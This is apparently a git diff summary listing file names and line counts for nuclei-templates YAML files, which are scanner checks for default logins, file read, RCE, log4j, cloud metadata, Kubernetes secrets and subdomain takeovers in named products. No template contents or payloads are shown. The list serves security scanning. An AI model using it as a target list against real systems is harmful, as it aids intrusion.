.../Other/glpi-default-login-7731.yaml | 63 + .../Other/glpi-default-login-7733.yaml | 72 - ...ml => glpi-telemetry-disclosure-7738.yaml} | 0 .../Other/glpi_CVE-2022-35914.yaml | 48 + .../Other/gnuboard-detect-7742.yaml | 31 + nuclei-templates/Other/gnuboard-detect.yaml | 35 - ...7745.yaml => go-anywhere-client-7743.yaml} | 0 .../Other/gocd-cruise-configuration-7746.yaml | 27 + .../Other/gocd-cruise-configuration-7748.yaml | 27 - .../Other/gogs-install-exposure-7755.yaml | 4 - nuclei-templates/Other/gogs-login-7759.yaml | 20 - nuclei-templates/Other/gogs-login.yaml | 25 + nuclei-templates/Other/goip-1-lfi-7762.yaml | 23 + nuclei-templates/Other/goip-1-lfi-7764.yaml | 20 - ...oogle-api-7772.yaml => google-api(1).yaml} | 0 .../Other/google-api-key-7768.yaml | 19 - nuclei-templates/Other/google-api-key.yaml | 16 + ...ed-7787.yaml => google-floc-disabled.yaml} | 0 
nuclei-templates/Other/google-secrets.yaml | 35 + .../Other/google-storage-7789.yaml | 18 + nuclei-templates/Other/google-storage.yaml | 17 - .../Other/google-textsearchplaces.yaml | 17 - .../Other/googlet-extsearchplaces.yaml | 25 + ...3.yaml => gophish-default-login-7792.yaml} | 0 .../gradio-CVE-2024-1728.yaml} | 0 ...yaml => gradle-enterprise-panel-7799.yaml} | 0 .../Other/grafana-default-login-7803.yaml | 19 +- nuclei-templates/Other/grafana-detect.yaml | 7 - .../Other/grafana-file-read-7811.yaml | 33 - nuclei-templates/Other/grafana-file-read.yaml | 27 + .../Other/grafana-public-signup-7817.yaml | 5 - .../grails-database-admin-console-7819.yaml | 22 + .../grails-database-admin-console-7820.yaml | 26 - .../Other/graphql-detect-7832.yaml | 151 + nuclei-templates/Other/graphql-detect.yaml | 158 - .../Other/graphql-field-suggestion-7834.yaml | 37 + .../Other/graphql-field-suggestion.yaml | 33 - .../Other/graphql-get-method-7836.yaml | 43 - .../Other/graphql-get-method.yaml | 34 + .../Other/grav-cms-detect-7842.yaml | 3 +- ...ser.yaml => graylog-api-browser-7846.yaml} | 0 .../Other/groovy-console-open.yaml | 33 + ...ice-lfi-7851.yaml => groupoffice-lfi.yaml} | 0 .../Other/gruntfile-exposure-7852.yaml | 26 + .../Other/gruntfile-exposure.yaml | 29 - nuclei-templates/Other/gsoap-lfl(1).yaml | 28 + ...900-login.yaml => gt-ac2900-login(1).yaml} | 0 ...ct-7862.yaml => gunicorn-detect-7864.yaml} | 0 .../Other/h2console-panel-7866.yaml | 21 - nuclei-templates/Other/h2console-panel.yaml | 20 + ...\350\256\241\347\263\273\347\273\237.yaml" | 20 + nuclei-templates/Other/h3c-imc-rce-7870.yaml | 40 - nuclei-templates/Other/h3c-imc-rce-7871.yaml | 35 + ...xposure-7874.yaml => hadoop-exposure.yaml} | 0 .../Other/hadoop-unauth-7875.yaml | 25 - .../Other/hadoop-unauth-7878.yaml | 21 + ...hanming-lfr.yaml => hanming-lfr-7880.yaml} | 0 ...ect-7881.yaml => hanwang-detect-7882.yaml} | 0 ...or-detect-7886.yaml => harbor-detect.yaml} | 0 .../Other/hashicorp-consul-rce-7890.yaml | 29 - 
.../Other/hashicorp-consul-rce-7891.yaml | 37 + .../Other/hashicorp-consul-webgui-7897.yaml | 37 + .../Other/hashicorp-consul-webgui.yaml | 37 - .../Other/hasura-graphql-psql-exec-7901.yaml | 39 + .../Other/hasura-graphql-psql-exec.yaml | 35 - .../Other/hatenablog-takeover-7909.yaml | 8 +- nuclei-templates/Other/hb-audio-lfi-7911.yaml | 32 + nuclei-templates/Other/hb-audio-lfi-7912.yaml | 29 - .../Other/header-command-injection-7917.yaml | 22 +- ...njection.yaml => header-injection(1).yaml} | 0 .../Other/header_blind_xss-7914.yaml | 17 - .../Other/header_blind_xss-7915.yaml | 17 + .../Other/heatmiser-wifi-thermostat-7924.yaml | 10 +- .../Other/helpjuice-takeover-7925.yaml | 15 + .../Other/helpjuice-takeover.yaml | 15 - .../Other/helpscout-takeover-7935.yaml | 16 - .../Other/helpscout-takeover.yaml | 19 + ...er-7941.yaml => heroku-takeover-7944.yaml} | 0 .../Other/herokuapp-detect-7937.yaml | 35 +- .../Other/hide-security-enhancer-lfi.yaml | 6 +- .../Other/hikvision-detection-7954.yaml | 23 + .../Other/hikvision-detection.yaml | 21 - ...959.yaml => hitron-technologies-7961.yaml} | 0 .../hjtcloud-arbitrary-file-read-7967.yaml | 33 - .../hjtcloud-arbitrary-file-read-7968.yaml | 39 + ...jtcloud-rest-arbitrary-file-read-7973.yaml | 36 - ...jtcloud-rest-arbitrary-file-read-7976.yaml | 35 + ...-panel-7978.yaml => hmc-hybris-panel.yaml} | 0 ... 
homeautomation-v3-openredirect-7986.yaml} | 0 .../honeywell-building-control-7987.yaml | 4 - .../Other/honeywell-scada-config-7992.yaml | 25 - .../Other/honeywell-scada-config.yaml | 25 + ...aml => honeywell-web-controller-7993.yaml} | 0 .../Other/hongdian-default-login-7997.yaml | 50 - .../Other/hongdian-default-login.yaml | 51 + .../Other/host-header-injection-8000.yaml | 2 +- nuclei-templates/Other/host_poisening.yaml | 88 - .../Other/hostheaderpoisoning.yaml | 62 + .../Other/hp-blade-admin-detect-8005.yaml | 24 - .../Other/hp-blade-admin-detect.yaml | 24 + ...8.yaml => hp-device-info-detect-8010.yaml} | 0 nuclei-templates/Other/hp-ilo-5-8021.yaml | 33 - nuclei-templates/Other/hp-ilo-5.yaml | 32 + .../Other/hp-ilo-serial-key-disclosure.yaml | 7 +- .../Other/hp-laserjet-detect-8027.yaml | 22 + .../Other/hp-laserjet-detect-8028.yaml | 23 - ...t.yaml => hp-media-vault-detect-8031.yaml} | 0 ...8034.yaml => hp-service-manager-8033.yaml} | 0 .../Other/hp-switch-default-login-8035.yaml | 42 - .../Other/hp-switch-default-login-8038.yaml | 29 + .../hpe-system-management-login-8014.yaml | 27 + .../hpe-system-management-login-8017.yaml | 27 - ...0.yaml => hrsale-unauthenticated-lfi.yaml} | 0 ...sort-fileRead.yaml => hsort-fileread.yaml} | 0 .../{hst-fileRead.yaml => hst-fileread.yaml} | 0 .../Other/htaccess-config-8042.yaml | 18 - nuclei-templates/Other/htaccess-config.yaml | 25 + .../Other/htpasswd-detection-8046.yaml | 25 + .../Other/htpasswd-detection.yaml | 25 - ...cd-unauthenticated-api-data-leak-8056.yaml | 30 + ...tp-etcd-unauthenticated-api-data-leak.yaml | 30 - .../{http-raw.yaml => http-raw-multiple.yaml} | 0 .../Other/httpbin-open-redirect-8047.yaml | 23 + .../Other/httpbin-open-redirect.yaml | 28 - ...aml => huatian-oa-upload-file-upload.yaml} | 0 .../Other/huawei-HG532e-default-login.yaml | 38 + .../Other/huawei-hg255s-lfi-8060.yaml | 23 - .../Other/huawei-hg255s-lfi-8061.yaml | 27 + ...awei-hg532e-default-router-login-8062.yaml | 37 - ...59-lfi.yaml => 
huawei-hg659-lfi-8067.yaml} | 0 .../Other/huawei-home-gateway-8072.yaml | 20 - .../Other/huawei-home-gateway.yaml | 24 + .../Other/huawei-router-auth-bypass-8075.yaml | 6 +- ...Read.yaml => huayu-reporter-fileread.yaml} | 0 .../Other/hubspot-takeover-8079.yaml | 17 + nuclei-templates/Other/hubspot-takeover.yaml | 17 - nuclei-templates/Other/hubspot.yaml | 31 - .../Other/hue-default-credential-8081.yaml | 16 +- .../Other/huijietong-cloud-fileread-8082.yaml | 33 - .../Other/huijietong-cloud-fileread-8087.yaml | 19 + ... ibm-advanced-system-management-8088.yaml} | 0 .../ibm-friendly-path-exposure-8092.yaml | 37 - .../Other/ibm-friendly-path-exposure.yaml | 32 + .../Other/ibm-infoprint-lfi-8101.yaml | 22 + nuclei-templates/Other/ibm-infoprint-lfi.yaml | 21 - .../ibm-mqseries-default-login-8106.yaml | 50 + .../Other/ibm-mqseries-default-login.yaml | 39 - ...gin-8111.yaml => ibm-note-login-8110.yaml} | 0 ....yaml => ibm-security-access-manager.yaml} | 0 ...ect.yaml => ibm-sterling-detect-8122.yaml} | 0 .../ibm-storage-default-credential-8124.yaml | 42 - .../Other/ibm-storage-default-credential.yaml | 46 + .../Other/ibm-websphere-ssrf-8126.yaml | 23 + .../Other/ibm-websphere-ssrf.yaml | 24 - .../Other/icewarp-webclient-rce-8133.yaml | 29 + .../Other/icewarp-webclient-rce.yaml | 31 - nuclei-templates/Other/icinga-web-login.yaml | 7 +- nuclei-templates/Other/id-q-xss.yaml | 42 + nuclei-templates/Other/id-xss.yaml | 46 - ...l => idemia-biometrics-default-login.yaml} | 0 .../Other/identity-services-engine-8147.yaml | 21 + .../Other/identity-services-engine.yaml | 21 - .../Other/idor-vuln-params(1).yaml | 16 + nuclei-templates/Other/idor-vuln-params.yaml | 16 - ...l => iis-internal-ip-disclosure-8149.yaml} | 0 ...-detect-8154.yaml => ilo-detect-8156.yaml} | 0 ...-detect.yaml => influxdb-detect-8160.yaml} | 0 ...spur-clusterengine-default-login-8162.yaml | 42 + .../inspur-clusterengine-default-login.yaml | 39 - ...\345\212\241\347\263\273\347\273\237.yaml" | 20 + 
.../Other/intercom-takeover-8166.yaml | 17 - nuclei-templates/Other/intercom-takeover.yaml | 17 + .../Other/interlib-fileread-8170.yaml | 23 - .../Other/interlib-fileread-8171.yaml | 22 + nuclei-templates/Other/internet-service.yaml | 6 +- .../Other/iomega-emc-shared-nas-8181.yaml | 30 + .../Other/iomega-emc-shared-nas.yaml | 25 - .../Other/ioncube-loader-wizard-8184.yaml | 4 - ...e.yaml => iotawatt-app-exposure-8187.yaml} | 0 .../Other/iplanet-imap-detect-8188.yaml | 23 - .../Other/iplanet-imap-detect.yaml | 23 + ...92.yaml => iptime-default-login-8193.yaml} | 0 .../Other/issuu-panel-lfi-8199.yaml | 29 - nuclei-templates/Other/issuu-panel-lfi.yaml | 28 + nuclei-templates/Other/iterable.yaml | 24 - nuclei-templates/Other/itop-detect-8201.yaml | 24 - nuclei-templates/Other/itop-detect-8203.yaml | 19 + .../{itop-panel.yaml => itop-panel-8205.yaml} | 0 .../Other/ixcache-panel-8206.yaml | 25 + nuclei-templates/Other/ixcache-panel.yaml | 24 - .../Other/jaeger-ui-dashboard-8207.yaml | 20 + .../Other/jaeger-ui-dashboard.yaml | 24 - .../Other/jamf-log4j-jndi-rce-8212.yaml | 33 - .../Other/jamf-log4j-jndi-rce.yaml | 34 + .../{jamf-panel.yaml => jamf-panel-8216.yaml} | 0 .../Other/jaspersoft-detect-8218.yaml | 17 + .../Other/jaspersoft-detect-8219.yaml | 16 - .../Other/java-melody-exposed.yaml | 10 +- .../Other/java-rmi-detect-8228.yaml | 21 + nuclei-templates/Other/java-rmi-detect.yaml | 17 - .../Other/jazzhr-takeover-8233.yaml | 15 + .../Other/jazzhr-takeover-8234.yaml | 15 - nuclei-templates/Other/jboss-detect-8237.yaml | 25 + nuclei-templates/Other/jboss-detect.yaml | 22 - nuclei-templates/Other/jboss-status-8241.yaml | 30 + nuclei-templates/Other/jboss-status-8243.yaml | 25 - .../Other/jdbc-connection-string-8244.yaml | 18 - .../Other/jdbc-connection-string.yaml | 15 + .../Other/jeecg-boot-detect-8248.yaml | 25 + nuclei-templates/Other/jeecg-boot-detect.yaml | 21 - nuclei-templates/Other/jeewms-lfi-8253.yaml | 36 - nuclei-templates/Other/jeewms-lfi.yaml | 28 + 
nuclei-templates/Other/jellyfin-detect.yaml | 7 +- ...panel-8261.yaml => jenkins-api-panel.yaml} | 0 .../Other/jenkins-asyncpeople-8266.yaml | 20 + .../Other/jenkins-asyncpeople-8269.yaml | 20 - .../Other/jenkins-default-8272.yaml | 40 - .../Other/jenkins-default-8273.yaml | 43 + ...ect-8275.yaml => jenkins-detect-8276.yaml} | 0 ...ogin-8280.yaml => jenkins-login-8277.yaml} | 0 .../Other/jenkins-script-8281.yaml | 35 - .../Other/jenkins-script-8283.yaml | 25 + .../Other/jetbrains-takeover-8292.yaml | 5 +- .../Other/jetty-showcontexts-enable-8295.yaml | 24 + .../Other/jetty-showcontexts-enable.yaml | 20 - nuclei-templates/Other/jfrog-8306.yaml | 30 + nuclei-templates/Other/jfrog-login.yaml | 19 - .../jfrog-unauth-build-exposed-8299.yaml | 35 - .../Other/jfrog-unauth-build-exposed.yaml | 31 + ...7.yaml => jinfornet-jreport-lfi-8310.yaml} | 0 .../Other/jinher-oa-default-login-8311.yaml | 10 +- nuclei-templates/Other/jira-detect-8314.yaml | 29 - nuclei-templates/Other/jira-detect-8316.yaml | 25 + nuclei-templates/Other/jira-login-check.yaml | 46 + .../Other/jira-login-default.yaml | 47 - .../Other/jira-service-desk-signup-8317.yaml | 21 - .../Other/jira-service-desk-signup-8321.yaml | 23 + .../jira-unauthenticated-dashboards-8326.yaml | 27 + .../jira-unauthenticated-dashboards.yaml | 27 - ...ira-unauthenticated-installed-gadgets.yaml | 4 - ...authenticated-projectcategories-8332.yaml} | 0 ...jira-unauthenticated-user-picker-8341.yaml | 15 + .../jira-unauthenticated-user-picker.yaml | 13 - .../Other/jkstatus-manager-8344.yaml | 5 +- ...onsole-8352.yaml => jmx-console-8353.yaml} | 0 ...login.yaml => jmx-default-login-8356.yaml} | 0 nuclei-templates/Other/jolokia-8368.yaml | 20 + nuclei-templates/Other/jolokia-8369.yaml | 21 - .../Other/jolokia-info-disclosure-8358.yaml | 71 + .../Other/jolokia-info-disclosure.yaml | 73 - nuclei-templates/Other/jolokia-list-8360.yaml | 27 + nuclei-templates/Other/jolokia-list.yaml | 27 - .../jolokia-unauthenticated-lfi-8366.yaml | 12 +- 
...3.yaml => joomla-com-fabrik-lfi-8371.yaml} | 0 ...file.yaml => joomla-config-file-8376.yaml} | 0 .../Other/joomla-file-listing.yaml | 18 +- .../Other/joomla-htaccess-8381.yaml | 25 - .../Other/joomla-htaccess-8383.yaml | 25 + .../Other/joomla-manifest-file-8387.yaml | 25 + .../Other/joomla-manifest-file.yaml | 31 - nuclei-templates/Other/joomla-panel-8389.yaml | 18 - nuclei-templates/Other/joomla-panel-8391.yaml | 18 + nuclei-templates/Other/joomla.yaml | 173650 --------------- .../Other/jsf-detection-8398.yaml | 36 + nuclei-templates/Other/jsf-detection.yaml | 31 - .../Other/jupyter-ipython-unauth-8405.yaml | 30 + .../Other/jupyter-ipython-unauth.yaml | 21 - .../Other/jupyter-notebook-8407.yaml | 34 + nuclei-templates/Other/jupyter-notebook.yaml | 27 - .../Other/jupyterhub-default-login-8399.yaml | 14 +- nuclei-templates/Other/jwt-token-8408.yaml | 18 + nuclei-templates/Other/jwt-token-8410.yaml | 15 - nuclei-templates/Other/kafdrop-xss-8411.yaml | 4 - .../kafka-center-default-login-8415.yaml | 47 + .../Other/kafka-center-default-login.yaml | 42 - .../Other/kafka-center-login-8418.yaml | 3 - ...ect-ui.yaml => kafka-connect-ui-8420.yaml} | 0 ...-8425.yaml => kafka-consumer-monitor.yaml} | 0 .../Other/kafka-cruise-control-8427.yaml | 21 + .../Other/kafka-cruise-control.yaml | 18 - ...ui-8432.yaml => kafka-topics-ui-8434.yaml} | 0 ...8442.yaml => keenetic-web-login-8443.yaml} | 0 .../Other/kenesto-login-8445.yaml | 22 + nuclei-templates/Other/kenesto-login.yaml | 26 - ...ogin-8446.yaml => kentico-login-8447.yaml} | 0 .../Other/keo-klr300n-install.yaml | 39 + ...50.yaml => kerio-connect-client-8452.yaml} | 0 .../Other/kevinlab-bems-backdoor-8453.yaml | 40 - .../Other/kevinlab-bems-backdoor-8456.yaml | 33 + ...sqli.yaml => kevinlab-bems-sqli-8459.yaml} | 0 .../Other/kevinlab-hems-backdoor-8466.yaml | 41 - .../Other/kevinlab-hems-backdoor.yaml | 35 + .../Other/key-cloak-admin-panel-8468.yaml | 24 + .../Other/key-cloak-admin-panel-8470.yaml | 18 - 
.../Other/keycloak-json-8472.yaml | 25 - nuclei-templates/Other/keycloak-json.yaml | 21 + .../Other/keycloak-openid-config-8475.yaml | 30 + .../Other/keycloak-openid-config.yaml | 25 - nuclei-templates/Other/keycloak-xss-8478.yaml | 28 + nuclei-templates/Other/keycloak-xss-8481.yaml | 23 - ...na-detect-8484.yaml => kibana-detect.yaml} | 0 ...bana-panel.yaml => kibana-panel-8485.yaml} | 0 nuclei-templates/Other/kingdee-eas.yaml | 27 + .../kingdee\344\272\247\345\223\201.yaml" | 32 + ...login.yaml => kingsoft-default-login.yaml} | 0 ...gsoft-upload.yaml => kingsoft-upload.yaml} | 0 .../Other/kingsoft-v8-file-read-8491.yaml | 27 + .../Other/kingsoft-v8-file-read.yaml | 34 - .../Other/kinsta-takeover-8493.yaml | 19 + .../Other/kinsta-takeover-8494.yaml | 18 - nuclei-templates/Other/kiwitcms-login.yaml | 5 +- nuclei-templates/Other/klr300n-installer.yaml | 36 - nuclei-templates/Other/kong-detect-8500.yaml | 24 +- ...lt-login.yaml => konga-default-login.yaml} | 0 ...ts-8503.yaml => kube-api-deployments.yaml} | 0 .../Other/kube-api-namespaces-8506.yaml | 6 +- nuclei-templates/Other/kube-api-nodes.yaml | 13 +- .../Other/kube-api-pods-8509.yaml | 26 - nuclei-templates/Other/kube-api-pods.yaml | 22 + .../Other/kube-api-secrets-8511.yaml | 26 + nuclei-templates/Other/kube-api-secrets.yaml | 22 - .../Other/kube-api-services-8513.yaml | 26 - .../Other/kube-api-services-8514.yaml | 22 + .../Other/kubeflow-dashboard-unauth-8515.yaml | 27 + .../Other/kubeflow-dashboard-unauth.yaml | 26 - .../Other/kubelet-metrics-8521.yaml | 7 +- ...belet-pods-8522.yaml => kubelet-pods.yaml} | 0 .../Other/kubelet-runningpods-8525.yaml | 22 - nuclei-templates/Other/kubelet-scan.yaml | 26 + ... 
kubernetes-kustomization-disclosure.yaml} | 0 .../Other/kubernetes-metrics-8536.yaml | 7 +- .../Other/kubernetes-mirantis-8541.yaml | 21 + .../Other/kubernetes-mirantis.yaml | 27 - ...ods-api.yaml => kubernetes-pods-8546.yaml} | 0 ...tes-unauth.yaml => kubernetes-unauth.yaml} | 0 nuclei-templates/Other/kubio.yaml | 59 + .../Other/kyocera-m2035dn-lfi-8557.yaml | 28 + .../Other/kyocera-m2035dn-lfi-8559.yaml | 22 - .../Other/landingi-takeover-8566.yaml | 20 + .../Other/landingi-takeover-8567.yaml | 17 - .../Other/landray-oa-fileread-8569.yaml | 47 + .../Other/landray-oa-fileread.yaml | 41 - .../Other/landray-oa-treexml-rce.yaml | 28 - .../Other/lansweeper-login-8572.yaml | 26 + nuclei-templates/Other/lansweeper-login.yaml | 22 - .../Other/laravel-debug-enabled-8576.yaml | 19 + .../Other/laravel-debug-enabled-8577.yaml | 27 - ...el-env-8586.yaml => laravel-env-8580.yaml} | 0 .../Other/laravel-filemanager-8590.yaml | 4 + .../Other/laravel-log-file-8597.yaml | 31 + .../Other/laravel-log-file-8598.yaml | 32 - nuclei-templates/Other/laravel.yaml | 19 +- nuclei-templates/Other/lazy-file-8608.yaml | 18 + nuclei-templates/Other/lazy-file.yaml | 17 - .../Other/leostream-panel-8609.yaml | 17 +- nuclei-templates/Other/lfi-linux-fuzz.yaml | 78 + ...ess-lfr (copy 1).yaml => lfr_express.yaml} | 0 ...4.yaml => liferay-portal-detect-8626.yaml} | 0 nuclei-templates/Other/linkedin-id-11853.yaml | 25 - nuclei-templates/Other/linkedin-id.yaml | 16 + .../Other/linkerd-badrule-detect-8630.yaml | 45 + nuclei-templates/Other/linkerd-detect.yaml | 38 - .../Other/linkerd-service-detect-8634.yaml | 28 - .../Other/linkerd-service-detect.yaml | 29 + .../Other/linkerd-ssrf-detect-8637.yaml | 18 + .../Other/linkerd-ssrf-detect.yaml | 19 - nuclei-templates/Other/linux-lfi-fuzz.yaml | 98 - nuclei-templates/Other/linux-lfi-fuzzing.yaml | 51 - ...ra.yaml => liveview-axis-camera-8648.yaml} | 0 .../Other/log4j-fuzz-head-poc.yaml | 55 + nuclei-templates/Other/log4j-header.yaml | 55 - 
nuclei-templates/Other/log4j-rce.yaml | 48 - nuclei-templates/Other/log4jshell-detect.yaml | 36 - nuclei-templates/Other/log4jshell.yaml | 31 + nuclei-templates/Other/loqate.yaml | 2 +- .../Other/lotus-domino-version-8655.yaml | 30 + .../Other/lotus-domino-version-8656.yaml | 32 - nuclei-templates/Other/lotuscms-rce-8653.yaml | 7 +- nuclei-templates/Other/lucee-detect-8660.yaml | 4 + nuclei-templates/Other/lucee-login-8663.yaml | 21 + nuclei-templates/Other/lucee-login-8665.yaml | 25 - .../Other/lucee-stack-trace-8668.yaml | 21 + nuclei-templates/Other/lucee-stack-trace.yaml | 25 - ...luftguitar-arbitrary-file-upload-8672.yaml | 24 - .../luftguitar-arbitrary-file-upload.yaml | 23 + ...8686.yaml => maccmsv10-backdoor-8683.yaml} | 0 .../Other/magento-2-exposed-api-8688.yaml | 37 - .../Other/magento-2-exposed-api-8689.yaml | 40 + .../Other/magento-admin-panel-8692.yaml | 27 - .../Other/magento-admin-panel-8695.yaml | 21 + .../Other/magento-cacheleak-8696.yaml | 37 - .../Other/magento-cacheleak-8698.yaml | 33 + ...o-config-8702.yaml => magento-config.yaml} | 0 .../Other/magento-detect-8705.yaml | 30 + nuclei-templates/Other/magento-detect.yaml | 28 - ...ml => magento-information-disclosure.yaml} | 0 .../magento-unprotected-dev-files-8709.yaml | 31 + .../Other/magento-unprotected-dev-files.yaml | 32 - ...agicFlow-sqli.yaml => magicflow-sqli.yaml} | 0 nuclei-templates/Other/magmi-detect-8715.yaml | 5 +- .../Other/maian-cart-detect-8719.yaml | 17 + nuclei-templates/Other/maian-cart-detect.yaml | 14 - .../Other/maian-cart-preauth-rce-8721.yaml | 29 +- .../Other/mailchimp-api-11854.yaml | 16 - nuclei-templates/Other/mailchimp-api.yaml | 13 + nuclei-templates/Other/mailgun-api(1).yaml | 3 + nuclei-templates/Other/mailgun.yaml | 2 +- .../manage-engine-admanager-panel-8731.yaml | 16 - .../Other/manage-engine-admanager-panel.yaml | 14 + .../Other/manageengine-adaudit-8728.yaml | 34 - .../Other/manageengine-adaudit.yaml | 21 + ...l => manageengine-adselfservice-8736.yaml} | 0 
...-8742.yaml => manageengine-analytics.yaml} | 0 .../manageengine-apex-helpdesk-8747.yaml | 24 + .../Other/manageengine-apex-helpdesk.yaml | 19 - ...nageengine-applications-manager-8752.yaml} | 0 .../manageengine-assetexplorer-8756.yaml | 19 + .../manageengine-assetexplorer-8757.yaml | 20 - .../Other/manageengine-desktop-8763.yaml | 6 +- .../manageengine-keymanagerplus-8764.yaml | 26 - .../Other/manageengine-keymanagerplus.yaml | 25 + .../Other/manageengine-opmanager-8767.yaml | 30 + .../Other/manageengine-opmanager-8768.yaml | 26 - .../Other/manageengine-servicedesk-8771.yaml | 23 + .../Other/manageengine-servicedesk-8772.yaml | 26 - .../Other/manageengine-supportcenter.yaml | 9 +- .../Other/mantis-detect-8780.yaml | 18 - .../Other/mantis-detect-8782.yaml | 15 + .../Other/mantisbt-default-credential.yaml | 4 +- nuclei-templates/Other/mapbox.yaml | 23 - ...r-8786.yaml => mashery-takeover-8785.yaml} | 0 .../Other/{get.yaml => match-1.yaml} | 0 .../Other/mcafee-epo-rce-8793.yaml | 34 + nuclei-templates/Other/mcafee-epo-rce.yaml | 29 - ...-8796.yaml => mdb-database-file-8795.yaml} | 0 ...akeover-8798.yaml => medium-takeover.yaml} | 0 ...d-stats.yaml => memcached-stats-8800.yaml} | 0 .../Other/meshcentral-login-8801.yaml | 25 + .../Other/meshcentral-login-8803.yaml | 21 - .../Other/metadata-alibaba-8807.yaml | 39 + .../Other/metadata-alibaba-8809.yaml | 41 - nuclei-templates/Other/metadata-aws-8810.yaml | 41 + nuclei-templates/Other/metadata-aws.yaml | 42 - .../Other/metadata-azure-8813.yaml | 45 + .../Other/metadata-azure-8815.yaml | 42 - .../Other/metadata-digitalocean-8818.yaml | 39 + .../Other/metadata-digitalocean.yaml | 39 - .../Other/metadata-google-8820.yaml | 40 - nuclei-templates/Other/metadata-google.yaml | 40 + .../Other/metadata-hetzner-8822.yaml | 42 + .../Other/metadata-hetzner-8823.yaml | 42 - .../Other/metadata-openstack-8827.yaml | 43 - .../Other/metadata-openstack.yaml | 39 + .../Other/metadata-oracle-8830.yaml | 36 - 
.../Other/metadata-oracle-8831.yaml | 40 + nuclei-templates/Other/metatag-cms-8833.yaml | 8 +- ...microsoft-exchange-server-detect-8851.yaml | 27 - ...microsoft-exchange-server-detect-8853.yaml | 26 + ...8858.yaml => microsoft-teams-webhook.yaml} | 0 .../Other/microstrategy-ssrf-8859.yaml | 7 +- .../Other/microweber-detect-8863.yaml | 22 - nuclei-templates/Other/microweber-detect.yaml | 23 + .../Other/microweber-xss-8864.yaml | 40 - .../Other/microweber-xss-8865.yaml | 36 + .../Other/mida-eframework-xss-8869.yaml | 23 + .../Other/mida-eframework-xss.yaml | 27 - ...aph-8870.yaml => mikrotik-graph-8871.yaml} | 0 .../Other/mikrotik-routeros-8873.yaml | 22 - .../Other/mikrotik-routeros-8875.yaml | 25 + .../Other/minimouse-lfi-8877.yaml | 25 + nuclei-templates/Other/minimouse-lfi.yaml | 24 - .../Other/minio-default-login-8887.yaml | 35 - .../Other/minio-default-login.yaml | 44 + .../Other/minio-default-password-8891.yaml | 41 - .../Other/minio-default-password.yaml | 35 + ...-8898.yaml => mirai-unknown-rce-8899.yaml} | 0 .../Other/misconfigured-docker-8900.yaml | 30 + .../Other/misconfigured-docker.yaml | 26 - .../Other/mobileiron-log4j-jndi-rce-8904.yaml | 4 +- .../Other/mobotix-guest-camera-8911.yaml | 22 - .../Other/mobotix-guest-camera.yaml | 20 + .../Other/mofi4500-default-login-8913.yaml | 11 +- .../Other/moinmoin-detect-8916.yaml | 30 + .../Other/moinmoin-detect-8917.yaml | 30 - nuclei-templates/Other/mongodb-detect.yaml | 3 +- .../Other/mongodb-unauth-8928.yaml | 9 +- .../Other/monitorix-exposure-8932.yaml | 28 - .../Other/monitorix-exposure.yaml | 26 + .../Other/moodle-changelog-8935.yaml | 31 - .../Other/moodle-changelog-8936.yaml | 26 + .../Other/moodle-filter-jmol-lfi-8938.yaml | 18 - .../Other/moodle-filter-jmol-lfi-8941.yaml | 28 + .../Other/moodle-filter-jmol-xss-8944.yaml | 20 - .../Other/moodle-filter-jmol-xss-8945.yaml | 18 + nuclei-templates/Other/moodle-xss-8951.yaml | 27 - nuclei-templates/Other/moodle-xss.yaml | 28 + 
nuclei-templates/Other/mpsec-lfi-8954.yaml | 33 + nuclei-templates/Other/mpsec-lfi-8957.yaml | 28 - nuclei-templates/Other/mrtg-detect-8958.yaml | 27 - nuclei-templates/Other/mrtg-detect-8959.yaml | 26 + .../Other/ms-adcs-detect-8960.yaml | 52 +- ...ms-exchange-server-reflected-xss-8962.yaml | 32 - .../ms-exchange-server-reflected-xss.yaml | 27 + nuclei-templates/Other/msvod-sqli-8969.yaml | 19 + nuclei-templates/Other/msvod-sqli.yaml | 17 - .../Other/mthemeunus-lfi-8971.yaml | 14 +- .../multiples-swagger-xss-indentify.yaml | 31 - nuclei-templates/Other/multipurpose.yaml | 59 + .../Other/music-store-open-redirect-8972.yaml | 21 + .../Other/music-store-open-redirect.yaml | 21 - .../Other/mx-service-detector-8975.yaml | 69 - .../Other/mx-service-detector.yaml | 79 + ...xss-8978.yaml => my-chatbot-xss-8979.yaml} | 0 .../Other/mysql-native-password-8980.yaml | 18 + .../Other/mysql-native-password.yaml | 15 - nuclei-templates/Other/myucms-lfr-8985.yaml | 16 + nuclei-templates/Other/myucms-lfr-8987.yaml | 23 - .../Other/nagios-default-login-8990.yaml | 39 - .../Other/nagios-default-login-8991.yaml | 39 + .../Other/nagios-status-page-3.yaml | 18 + .../Other/nagios-status-page-8995.yaml | 21 - .../Other/nativechurch-wp-theme-lfd-8999.yaml | 26 + .../Other/nativechurch-wp-theme-lfd-9002.yaml | 23 - ...yaml => natshell-path-traversal-9005.yaml} | 0 nuclei-templates/Other/natshell-rce-9012.yaml | 27 + nuclei-templates/Other/natshell-rce.yaml | 22 - ...neos-detect.yaml => neos-detect-9013.yaml} | 0 nuclei-templates/Other/neos-panel-9016.yaml | 32 - nuclei-templates/Other/neos-panel.yaml | 27 + ...panel-9017.yaml => nessus-panel-9019.yaml} | 0 .../netdata-dashboard-detected-9021.yaml | 25 + .../Other/netdata-dashboard-detected.yaml | 21 - .../Other/netflix-conductor-ui-9023.yaml | 25 - .../Other/netflix-conductor-ui.yaml | 29 + .../Other/netflix-conductor-version-9024.yaml | 38 - .../Other/netflix-conductor-version.yaml | 37 + ...flow-analyzer-zoho-traffic-management.yaml | 21 
+ .../netgear-router-auth-bypass-9025.yaml | 34 - .../netgear-router-auth-bypass-9026.yaml | 28 + .../Other/netgear-router-exposure-9031.yaml | 20 +- nuclei-templates/Other/netis-info-leak.yaml | 3 +- nuclei-templates/Other/netis-router-9037.yaml | 25 + nuclei-templates/Other/netis-router.yaml | 24 - .../Other/netlify-takeover-9043.yaml | 20 + .../Other/netlify-takeover-9044.yaml | 21 - .../{Netoray-sqli.yaml => netoray-sqli.yaml} | 0 .../Other/{netrc-9046.yaml => netrc.yaml} | 0 .../Other/netscalar-aaa-login-9047.yaml | 2 - .../Other/netscaler-aaa-login-9050.yaml | 17 + .../Other/netscaler-aaa-login.yaml | 16 - .../Other/netscaler-gateway-9052.yaml | 14 + .../Other/netscaler-gateway-9055.yaml | 16 - .../Other/netsurveillance-web-9057.yaml | 23 - .../Other/netsurveillance-web.yaml | 22 + .../Other/netsus-default-login-9058.yaml | 9 +- ...gin-9061.yaml => netsus-server-login.yaml} | 0 .../Other/netsweeper-open-redirect-9064.yaml | 17 + .../Other/netsweeper-open-redirect.yaml | 18 - .../netsweeper-webadmin-detect-9067.yaml | 26 + 